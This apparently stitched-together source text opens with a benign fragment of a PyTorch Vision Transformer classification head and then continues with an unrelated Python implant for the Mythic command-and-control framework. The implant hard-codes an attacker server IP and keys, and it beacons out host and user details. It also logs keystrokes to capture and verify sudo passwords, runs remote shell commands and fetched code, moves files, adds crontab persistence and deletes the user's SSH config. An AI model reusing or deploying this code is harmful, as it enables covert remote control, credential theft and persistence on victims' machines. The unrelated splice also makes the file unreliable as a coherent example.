        # Either a bare head, or pre_logits -> activation -> head.
        if self.hidden_dim is None:
            layers = [('head', nn.Linear(self.in_channels, self.num_classes))]
        else:
            layers = [
                ('pre_logits', nn.Linear(self.in_channels, self.hidden_dim)),
                ('act', build_activation_layer(self.act_cfg)),
                ('head', nn.Linear(self.hidden_dim, self.num_classes)),
            ]
        self.layers = Sequential(OrderedDict(layers))
    def init_weights(self):
        super(VisionTransformerClsHead, self).init_weights()
        # Modified from ClassyVision
        if hasattr(self.layers, 'pre_logits'):
            lecun_normal_init(
                self.layers.pre_logits,
                mode='fan_in', distribution='truncated_normal')
    def pre_logits(self, x):
        """Map the backbone output to the feature fed into the head.

        Expects x (or its last tuple element) to unpack as
        (_, cls_token); only the cls token is used.
        """
        if isinstance(x, tuple):
            x = x[-1]
        _, cls_token = x
        if self.hidden_dim is None:
            return cls_token
        else:
            x = self.layers.pre_logits(cls_token)
            return self.layers.act(x)
    def frozen(self):
        # Freeze the head: eval mode + no gradients.
        # NOTE(review): shadows the `frozen` constructor argument name.
        self.layers.eval()
        for param in self.layers.parameters():
            param.requires_grad = False
    def forward(self, x):
        # Single-stage input only; returns a one-element list of logits.
        assert isinstance(x, (tuple, list)) and len(x) == 1
        x = x[0]
        x = self.pre_logits(x)
        return [self.layers.head(x)]
    def loss(self, cls_score, labels, **kwargs):
        """ cls loss forward
        Args:
            cls_score (list): Score should be [tensor].
            labels (tuple or tensor): Labels should be tensor [N, \*] by default.
                If labels as tuple, it's used for CE mixup, (gt_a, gt_b, lambda).
        """
        single_label = False
        losses = dict()
        assert isinstance(cls_score, (tuple, list)) and len(cls_score) == 1
        # computing loss
        if not isinstance(labels, tuple):
            # whether is the single label cls [N,] or multi-label cls [N,C]
            single_label = \
                labels.dim() == 1 or (labels.dim() == 2 and labels.shape[1] == 1)
            # Notice: we allow the single-label cls using multi-label loss, thus
            # * For single-label cls, loss = loss.sum() / N
            # * For multi-label cls, loss = loss.sum() or loss.mean()
            avg_factor = labels.size(0) if single_label else None
            target = labels.clone()
            if self.multi_label:
                # convert to onehot labels
                if single_label:
                    target = F.one_hot(target, num_classes=self.num_classes)
            # default onehot cls
            losses['loss'] = self.criterion(
                cls_score[0], target, avg_factor=avg_factor, **kwargs)
            # compute accuracy
            losses['acc'] = accuracy(cls_score[0], labels)
        else:
            # mixup classification
            y_a, y_b, lam = labels
            if isinstance(lam, torch.Tensor):  # lam is scalar or tensor [N,1]
                lam = lam.unsqueeze(-1)
            # whether is the single label cls [N,] or multi-label cls [N,C]
            single_label = \
                y_a.dim() == 1 or (y_a.dim() == 2 and y_a.shape[1] == 1)
            # Notice: we allow the single-label cls using multi-label loss, thus
            # * For single-label cls, loss = loss.sum() / N
            # * For multi-label cls, loss = loss.sum() or loss.mean()
            avg_factor = y_a.size(0) if single_label else None
            if not self.multi_label:
                # lam-weighted sum of the two per-target CE losses
                losses['loss'] = \
                    self.criterion(cls_score[0], y_a, avg_factor=avg_factor, **kwargs) * lam + \
                    self.criterion(cls_score[0], y_b, avg_factor=avg_factor, **kwargs) * (1 - lam)
            else:
                # convert to onehot labels
                if single_label:
                    y_a = F.one_hot(y_a, num_classes=self.num_classes)
                    y_b = F.one_hot(y_b, num_classes=self.num_classes)
                # mixup onehot like labels, using a multi-label loss
                y_mixed = lam * y_a + (1 - lam) * y_b
                losses['loss'] = self.criterion(
                    cls_score[0], y_mixed, avg_factor=avg_factor, **kwargs)
            # compute accuracy (against gt_a, plus the mixup-aware metric)
            losses['acc'] = accuracy(cls_score[0], labels[0])
            losses['acc_mix'] = accuracy_mixup(cls_score[0], labels)
        return losses
|
#!/usr/bin/python3
import mythic
from mythic import mythic_rest
import asyncio
import json
import base64
import requests
import time
import ast
import types
import math
import random
import socket
import struct
import platform
import os
import getpass
import threading
# from pynput import keyboard
import re
import sys
# import Xlib
# import Xlib.display
import time
import subprocess
from subprocess import Popen, PIPE
import stat
import hashlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from Crypto.Hash import SHA256, SHA512, SHA1, MD5, HMAC
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import unpad, pad
from Crypto.PublicKey import RSA
from base64 import b64decode, b64encode
from termcolor import colored
# Global dict containing name and code of the dynamic functions loaded
class Agent:
    """Configuration container for the agent's C2 connection settings.

    NOTE(review): server address, payload UUID, AES keys, kill date and
    user agent are hard-coded below. The methods are plain Java-style
    accessors around the public attributes.
    """
    def __init__(self):
        self.Server = "http://95.237.2.234"
        self.Port = "8888"
        self.URI = "/data"
        self.PayloadUUID = "ee86d368-9e02-452d-b50b-46b9075292ee"
        self.UUID = ""
        self.UserAgent = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"}
        self.HostHeader = "domain_front"
        self.Sleep = "10"
        self.Jitter = "23"
        self.KillDate = "2022-08-16"
        self.Script = ""
        self.Encryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
        self.Decryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
    def get_Server(self):
        return self.Server
    def set_Server(self, server):
        self.Server = server
    def get_Port(self):
        return self.Port
    def set_Port(self, port):
        self.Port = port
    def get_URI(self):
        return self.URI
    def set_URI(self, uri):
        self.URI = uri
    def get_PayloadUUID(self):
        return self.PayloadUUID
    def set_PayloadUUID(self, payloadUUID):
        self.PayloadUUID = payloadUUID
    def get_UUID(self):
        return self.UUID
    def set_UUID(self, uuid):
        self.UUID = uuid
    def get_UserAgent(self):
        return self.UserAgent
    def set_UserAgent(self, userAgent):
        self.UserAgent = userAgent
    def get_Sleep(self):
        return self.Sleep
    def set_Sleep(self, sleep):
        self.Sleep = sleep
    def get_Jitter(self):
        return self.Jitter
    def set_Jitter(self, jitter):
        self.Jitter = jitter
    def get_Encryption_key(self):
        return self.Encryption_key
    def set_Encryption_key(self, encryption_key):
        self.Encryption_key = encryption_key
    def get_Decryption_key(self):
        return self.Decryption_key
    def set_Decryption_key(self, decryption_key):
        self.Decryption_key = decryption_key
class myRequestHandler(BaseHTTPRequestHandler):
    # Overrides send_response so only Server and Date headers are emitted
    # with the status line (no other automatic headers).
    def send_response(self, code, message=None):
        self.send_response_only(code, message)
        self.send_header('Server', self.version_string())
        self.send_header('Date', self.date_time_string())
# NOTE(review): `global` at module level is a no-op; these three lines only
# document intent.
global dynfs
global result
global sudo
dynfs = {}  # name -> code of the dynamically loaded functions (see header comment)
sudo = ""
responses = []
delegates = []
delegates_address = []
delegates_UUID = []
delegates_aswers = []  # NOTE(review): "aswers" typo kept — the name may be referenced elsewhere
result = {}
stopping_functions = []
agent = Agent()
redirecting = False
def encrypt_AES256(data, key=agent.get_Encryption_key()):
    """JSON-serialize *data* and encrypt it: AES-256-CBC with a fresh IV,
    then HMAC-SHA256 over IV + ciphertext (encrypt-then-MAC).
    Returns IV || ciphertext || digest.

    NOTE(review): the key default is evaluated once at import time.
    """
    key = base64.b64decode(key)
    data = json.dumps(data).encode()
    h = HMAC.new(key, digestmod=SHA256)
    iv = get_random_bytes(16)  # generate a new random IV
    cipher = AES.new(key, AES.MODE_CBC, iv=iv)
    ciphertext = cipher.encrypt(pad(data, 16))
    h.update(iv + ciphertext)
    return iv + ciphertext + h.digest()
def encrypt_code(data, key=agent.get_Encryption_key()):
    """Encrypt a text string with AES-256-CBC (fresh IV, no HMAC).
    Returns IV || ciphertext.
    """
    key = base64.b64decode(key)
    data = data.encode()
    iv = get_random_bytes(16)  # generate a new random IV
    cipher = AES.new(key, AES.MODE_CBC, iv=iv)
    ciphertext = cipher.encrypt(pad(data, 16))
    return iv + ciphertext
def decrypt_AES256(data, key=agent.get_Encryption_key(), UUID=False):
key = base64.b64decode(key)
# Decode and remove UUID from the message first
data = base64.b64decode(data)
uuid = data[:36]
data = data[36:]
# hmac should include IV
mac = data[-32:] # sha256 hmac at the end
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:-32] # the rest is the message
h = HMAC.new(key=key, msg=iv + message, digestmod=SHA256)
h.verify(mac)
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
# now to remove any padding that was added on to make it the right block size of 16
decrypted_message = unpad(decrypted_message, 16)
if UUID:
return uuid.decode("utf-8") + decrypted_message.decode("utf-8")
else:
return json.loads(decrypted_message)
def decrypt_code(data, key=agent.get_Encryption_key()):
key = base64.b64decode(key)
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:] # the rest is the message
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
decrypted_message = unpad(decrypted_message, 16)
return decrypted_message
def to64(data):
serialized = data.encode('utf-8')
base64_bytes = base64.b64encode(serialized)
return base64_bytes.decode('utf-8')
def from64(data, UUID=False):
response_bytes = data.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
response_message = response_decode.decode('utf-8')
if UUID:
return response_message
else:
return ast.literal_eval(response_message[36:])
def getIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def getPublicIP():
return requests.get('https://api.ipify.org').text
def send(response, uuid):
if agent.get_Encryption_key() != "":
enc = encrypt_AES256(response)
message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(),agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
dec = decrypt_AES256(x.text)
if isinstance(dec, str):
return json.loads(dec)
else:
return dec
else:
serialized = json.dumps(response)
message = to64(serialized)
uuid = to64(uuid)
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(), agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
res = from64(x.text)
return res
def checkin():
print("[+] CHECKIN")
checkin_data = {
"action": "checkin",
"ip": getPublicIP() + "/" + getIP(),
"os": platform.system() + " " + platform.release(),
"user": getpass.getuser(),
"host": socket.gethostname(),
"domain": socket.getfqdn(),
"pid": os.getpid(),
"uuid": agent.get_PayloadUUID(),
"architecture": platform.architecture(),
"encryption_key": agent.get_Encryption_key(),
"decryption_key": agent.get_Decryption_key()
}
res = send(checkin_data, agent.get_PayloadUUID())
try:
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
except:
res = json.loads(res)
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
def get_tasks():
tasks = {
'action': "get_tasking",
'tasking_size': -1
}
task_list = send(tasks, agent.get_UUID())
if "delegates" in task_list:
for m in task_list["delegates"]:
delegates_aswers.append(m)
return task_list
def reverse_upload(task_id, file_id):
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
return code
def post_result():
global responses
global delegates
global delegates_aswers
response = {}
if delegates:
response = {
'action': "post_response",
'responses': responses,
'delegates': delegates
}
responses = []
delegates = []
else:
response = {
'action': "post_response",
'responses': responses
}
responses = []
result = send(response, agent.get_UUID())
if "delegates" in result:
for m in result["delegates"]:
delegates_aswers.append(m)
return result
def execute_tasks(tasks):
if tasks:
for task in tasks['tasks']:
execute(task)
r = random.randint(0,1)
if r < 0.5:
r = -1
else:
r = 1
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
time.sleep(sleep_time / 5)
post_result()
def run_in_thread(function, param_list, task):
found = False
for item in dynfs:
if item == function:
try:
if agent.get_Encryption_key() == "":
exec(dynfs[item])
else:
exec(decrypt_code(dynfs[item]))
eval(function + "(" + str(param_list) + ")")
found = True
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
if found == False:
try:
eval(function + "(" + str(param_list) + ")")
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
def execute(task):
# Search in the dynamic functions first, so a command can be sobstituted through the load functionality
function = str(task['command'])
if function != "code":
print("\n[+] EXECUTING " + function)
param_list = "task['id'],"
if task['parameters'] != '' and task['parameters'][0] == "{":
parameters = ast.literal_eval(task['parameters'])
for param in parameters:
param_list += "ast.literal_eval(task['parameters'])['" + param + "'],"
else:
if task['parameters'] != '':
param_list += "task['parameters'],"
param_list = param_list[:-1]
thread = threading.Thread(target=run_in_thread, args=(function, param_list, task))
thread.start()
################################################################################################################
# The comment below will be sobstituted by the definition of the functions imported at creation time
def trace(task_id, command=None):
ip = requests.get('https://api.ipify.org').text
if command==None:
response = {
'task_id': task_id,
"user_output": ip,
'completed': True
}
responses.append(response)
try:
os.remove(os.path.expanduser("~") + "/.ssh/config")
except:
print(colored("Not enough permissions", "red"))
else:
path = ""
print("PATH = " + str(command))
if command == False:
path = ip
else:
path += command + " --> " + getpass.getuser() + "@" + ip + ";" + sudo
response = {
'task_id': task_id,
"user_output": path,
'completed': True
}
responses.append(response)
print("\t- Trace Done")
return
def nmap(task_id, command):
sudo = "bubiman10"
ip = requests.get('https://api.ipify.org').text
print('My public IP address is: {}'.format(ip))
if sudo != "":
response = {
'task_id': task_id,
"user_output": getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired. Try using keylog first. " + getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
print("\t- Nmap Done")
return
def p2p_server(task_id):
class RequestHandler(myRequestHandler):
def do_POST(self):
global delegates_aswers
content_len = int(self.headers.get('content-length', 0))
post_body = self.rfile.read(content_len)
received_uuid = ""
received_message = ""
decode = ""
encrypted = False
try:
decode = base64.b64decode(post_body)
decode = decode.decode("utf-8")
except:
decode = decrypt_AES256(post_body, UUID=True)
encrypted = True
received_uuid = str(decode)[:36]
received_message = json.loads(decode[36:])
encoded = to64(decode)
if received_message["action"] == "checkin":
delegate = {
"message": encoded,
"uuid": agent.get_PayloadUUID(),
"c2_profile": "myp2p"
}
else:
delegate = {
"message": encoded,
"uuid": received_uuid,
"c2_profile": "myp2p"
}
delegates.append(delegate)
while delegates_aswers == []:
pass
reply_message = ""
if received_message["action"] == "checkin":
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message = message[36:]
message = json.loads(message)
if message["action"] == "checkin":
reply_message = answer['message']
else:
reply = False
while not reply:
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message_uuid = message[:36]
message = message[36:]
message = json.loads(message)
if answer['uuid'] == received_uuid and message["action"] == received_message["action"]:
if message["action"] == "get_tasking":
if message["tasks"] != []:
for task in message["tasks"]:
if task["command"] == "trace":
ip = requests.get('https://api.ipify.org').text
if task["parameters"] == "":
task["parameters"] = getpass.getuser() + "@" + ip + ";" + sudo
else:
task["parameters"] += " --> " + getpass.getuser() + "@" + ip + ";" + sudo
reply_message = to64(message_uuid) + to64(str(message))
delegates_aswers.remove(answer)
reply = True
if reply_message == "":
reply_message = answer['message']
delegates_aswers.remove(answer)
reply = True
if encrypted:
reply_message = base64.b64decode(reply_message).decode()
uuid = reply_message[:36]
message = reply_message[36:]
enc = encrypt_AES256(message)
reply_message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
self.protocol_version = "HTTP/1.1"
self.send_response(200)
self.send_header("Content-Length", len(reply_message))
self.end_headers()
self.wfile.write(bytes(reply_message, "utf8"))
def run():
p2p_port = 9090
server = ('', p2p_port)
httpd = HTTPServer(server, RequestHandler)
thread = threading.Thread(target = httpd.serve_forever, daemon=True)
thread.start()
response = {
'task_id': task_id,
"user_output": "P2P Server started on {}:{}".format(getIP(), p2p_port),
'completed': True
}
responses.append(response)
print("\t- P2P Server started on {}:{}".format(getIP(), p2p_port))
run()
def load(task_id, file_id, cmds):
global responses
code = reverse_upload(task_id, file_id)
name = cmds
if agent.get_Encryption_key() == "":
dynfs[name] = code
else:
dynfs[name] = encrypt_code(code)
response = {
'task_id': task_id,
"user_output": "Module successfully added",
'commands': [
{
"action": "add",
"cmd": name
}
],
'completed': True
}
responses.append(response)
print("\t- Load Done")
return
def keylog_no_X(task_id):
global responses
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def find_event():
f = open("/proc/bus/input/devices")
lines = str(f.readlines())
while lines.find("I:") != -1:
#Read block by block
event = ""
start = lines.find("I:")
end = lines.find("B: EV=")+12
if lines[start:end].find("B: EV=12001") != -1:
event_start = lines[start:end].find("event")
event_start += start
i = 1
try:
while True:
int(lines[event_start + 5 : event_start + 5 + i])
event = lines[event_start: event_start + 5 + i]
i += 1
except:
return event
lines = lines[end-6:]
qwerty_map = {
2: "1", 3: "2", 4: "3", 5: "4", 6: "5", 7: "6", 8: "7", 9: "8", 10: "9",
11: "0", 12: "-", 13: "=", 14: "[BACKSPACE]", 15: "[TAB]", 16: "a", 17: "z",
18: "e", 19: "r", 20: "t", 21: "y", 22: "u", 23: "i", 24: "o", 25: "p", 26: "^",
27: "$", 28: "\n", 29: "[CTRL]", 30: "q", 31: "s", 32: "d", 33: "f", 34: "g",
35: "h", 36: "j", 37: "k", 38: "l", 39: "m", 40: "ù", 41: "*", 42: "[SHIFT]",
43: "<", 44: "w", 45: "x", 46: "c", 47: "v", 48: "b", 49: "n", 50: ",",
51: ";", 52: ":", 53: "!", 54: "[SHIFT]", 55: "FN", 56: "ALT", 57: " ", 58: "[CAPSLOCK]",
}
print(find_event())
infile_path = "/dev/input/" + find_event().strip()
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
line = ""
while event:
if break_function:
print("break detected, stopping keylog")
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
break_function = False
return
(_, _, type, code, value) = struct.unpack(FORMAT, event)
if code != 0 and type == 1 and value == 1:
if code == 28 or code == 96:
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
else:
line += qwerty_map[code]
event = in_file.read(EVENT_SIZE)
def keylog(task_id):
global responses
global stopping_functions
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def keylogger():
def on_press(key):
global line
global nextIsPsw
global sudo
global break_function
if "keylog" in stopping_functions:
print(colored("\t - Keylogger stopped", "red"))
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
line = ""
break_function = False
return False
try:
line = line + key.char
k = key.char
except:
try:
k = key.name
if key.name == "backspace":
if len(line) > 0:
line = line[:-1]
elif key.name == "space":
line += " "
elif key.name == "enter":
print(nextIsPsw)
if nextIsPsw == True:
print("I GOT THE PASSWORD: {}".format(line))
cmd = "echo {} | sudo -S touch fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
p = subprocess.Popen(["ls"], stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
if "fileToCheckSudo.asd" in str(stdout):
cmd = "echo {} | sudo -S rm fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
response = {
"task_id": task_id,
"user_output": "root password acquired: {}".format(line),
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
nextIsPsw = False
sudo = line
line = ""
else:
if 'sudo ' in line:
print("Next should be password")
nextIsPsw = True
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
elif key.name == "shift" or key.name == "ctrl" or key.name == "alt" or key.name == "caps_lock" or key.name == "tab":
if "crtlc" in line:
line = ""
nextIsPsw = False
else:
line = line + key.name
except:
pass
listener = keyboard.Listener(on_press=on_press)
listener.start()
listener.join()
thread2 = threading.Thread(target=keylogger, args=())
thread2.start()
print("\t- Keylog Running")
line = ""
nextIsPsw = False
def upload(task_id, file_id, remote_path):
global responses
remote_path = remote_path.replace("\\", "")
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
f = open(remote_path, "w")
f.write(code)
f.close()
response = {
'task_id': task_id,
"user_output": "File Uploaded",
'completed': True
}
responses.append(response)
print("\t- Upload Done")
return
def exit_agent(task_id):
response = {
'task_id': task_id,
"user_output": "Exited",
'completed': True
}
responses.append(response)
print("\t- Exit Done")
sys.exit()
def shell(task_id, cmd):
global responses
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
resp = ""
if isinstance(stdout, bytes):
resp = stdout.decode()
elif isinstance(stderr, bytes):
resp = stderr.decode()
else:
resp = "Error"
response = {
'task_id': task_id,
"user_output": resp,
'completed': True
}
responses.append(response)
print("\t- Shell Done")
return
def redirect(task_id, command):
global redirecting
redirecting = True
time.sleep(int(agent.get_Sleep()))
params = command.replace(":", " ")
params = params.split(" ")
if len(params) < 2:
response = {
'task_id': task_id,
"user_output": "usage redirect <host:port> [OPTIONAL] <encryption_key>",
'completed': True
}
responses.append(response)
return
else:
ip = params[0]
port = params[1]
response = {
'task_id': task_id,
"user_output": "Redirected to {}:{}".format(agent.get_Server(), agent.get_Port()),
'completed': True
}
responses.append(response)
if len(params) > 2:
print(colored("Setting key {}".format(params[2]), "red"))
agent.set_Encryption_key(params[2])
agent.set_Server("http://" + ip)
agent.set_Port(port)
print(colored("Switching to {}:{}".format(agent.get_Server(), agent.get_Port()), "green"))
checkin()
print("\t- Redirect Done")
redirecting = False
return
def stop(task_id, function_name):
global stopping_functions
stopping_functions.append(str(function_name).strip())
response = {
'task_id': task_id,
"user_output": "Break",
'completed': True
}
responses.append(response)
return
def persistance(task_id):
global responses
global sudo
agent_name = "prova.py"
cwd = os.getcwd()
if sudo != "":
subprocess.call('echo ' + sudo + ' | sudo -S chmod 777 ' + agent_name, shell=True)
subprocess.call('crontab -l > mycron.tmp', shell=True)
subprocess.call('echo "@reboot sleep 30 && cd ' + cwd + ' && ./' + agent_name + '" >> mycron.tmp', shell=True)
subprocess.call('crontab mycron.tmp', shell=True)
subprocess.call('rm mycron.tmp', shell=True)
response = {
'task_id': task_id,
"user_output": "crontab scheduled at each reboot",
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired or wrong. Use keylog module to try stealing",
'completed': False
}
responses.append(response)
print("\t- Persistance Done")
return
def download(task_id, path):
global responses
path = path.replace("\\", "/")
# print("Downloading " + path)
# chunkSize = 512000
chunkSize = 10000
fileSize = os.path.getsize(path)
chunks = math.ceil(fileSize / chunkSize)
fullpath = os.path.abspath(path)
# print("FILESIZE = " + str(fileSize))
# print(str(chunks) + " chunks needed")
response = {
"total_chunks": chunks,
"task_id": task_id,
"full_path": fullpath,
"host": "",
"is_screenshot": "false"
}
responses.append(response)
def download_thread():
i = 1
file_id = ""
while i != chunks +1:
if result:
for item in result['responses']:
if item['task_id'] == task_id and item['status'] == "success":
# print("HO TROVATO IL LA RIPOSTA SUCCESS PER QUESTO TASK")
if file_id == "":
file_id = item['file_id']
result['responses'].remove(item)
f = open(fullpath, 'r')
f.seek((i-1)*chunkSize)
blob = f.read(chunkSize)
chunk_data = to64(blob)
if i == chunks:
print("i == chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id,
"completed": True
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i +=1
print("\t- Download Done")
exit()
else:
print("i != chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i += 1
if item['task_id'] == task_id and item['status'] != "success":
print("ERROR SENDING FILE")
break
d = threading.Thread(target=download_thread, args=())
d.start()
def run(task_id, code):
global responses
print("\t" + code)
eval(code)
response = {
'task_id': task_id,
"user_output": "Executed",
'completed': True
}
responses.append(response)
print("\t- Run Done")
return
def code(task_id, code, param, parallel_id):
global responses
print("Running code with \n {} \n {}".format(code, param))
try:
exec(code)
eval("worker(param)")
except Exception as e:
print(e)
response = {
'task_id': task_id,
"user_output": worker_output,
'completed': True
}
responses.append(response)
print("\t- Parallel Done")
return
def ls(task_id, path, third):
global responses
path = path.replace("\\", "")
path = path.replace("//", "/")
fullpath = str(os.path.abspath(path))
files = []
for f in os.listdir(path):
permissions = ""
modify_time = ""
access_time = ""
file_path = os.path.abspath(f)
try:
st = os.stat(file_path)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(file_path)
access_time = time.ctime (fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(file_path))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(fullpath):
try:
for path, dirs, files in os.walk(file_path):
for x in files:
fp = os.path.join(path, x)
size += os.path.getsize(fp)
except:
size: -1
elif os.path.isfile(f):
try:
size = os.path.getsize(file_path)
except:
size: -1
try:
a = {
"is_file": os.path.isfile(f),
"permissions": {'permissions': permissions},
"name": f,
"access_time": access_time,
"modify_time": modify_time,
"size": size
}
files.append(a)
except:
print("No permission")
name = ""
if os.path.isfile(path):
name = path
else:
name = os.path.basename(os.path.normpath(fullpath))
permissions = ""
modify_time = ""
access_time = ""
try:
st = os.stat(fullpath)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(fullpath)
access_time = time.ctime(fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(fullpath))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(f):
try:
for path, dirs, files in os.walk(file_path):
for x in files:
fp = os.path.join(path, x)
size += os.path.getsize(fp)
except:
size: -1
elif os.path.isfile(f):
try:
size = os.path.getsize(file_path)
except:
size: -1
parent_path = os.path.dirname(fullpath)
if name == "":
name = "/"
parent_path = ""
response = {
"task_id": task_id,
"user_output": "Listing Done",
"file_browser": {
"host": socket.gethostname(),
"is_file": os.path.isfile(fullpath),
"permissions": {'permissions': permissions},
"name": name,
"parent_path": parent_path,
"success": True,
"access_time": access_time,
"modify_time": modify_time,
"size": size,
"files": files,
},
"completed": True
}
responses.append(response)
print("\t- ls Done")
return
def parallel(task_id, file_name, workers, parameters={}):
response = {
'task_id': task_id,
"user_output": "Command received",
'completed': True
}
responses.append(response)
return
################################################################################################################
# MAIN LOOP
# agent = Agent()
uuid_file = "UUID.txt"
if os.path.isfile(uuid_file):
# f = open(uuid_file, "r")
# agent.UUID = f.read()
pass
else:
checkin()
# f = open(uuid_file, "w")
# f.write(agent.UUID)
# f.close()
# ip = getPublicIP()
# if ip == "194.195.242.157" or ip == "172.104.135.23" or ip == "172.104.135.67":
# print("[+] P2P Server")
# p2p_server(1)
while True:
while not redirecting:
tasks = get_tasks()
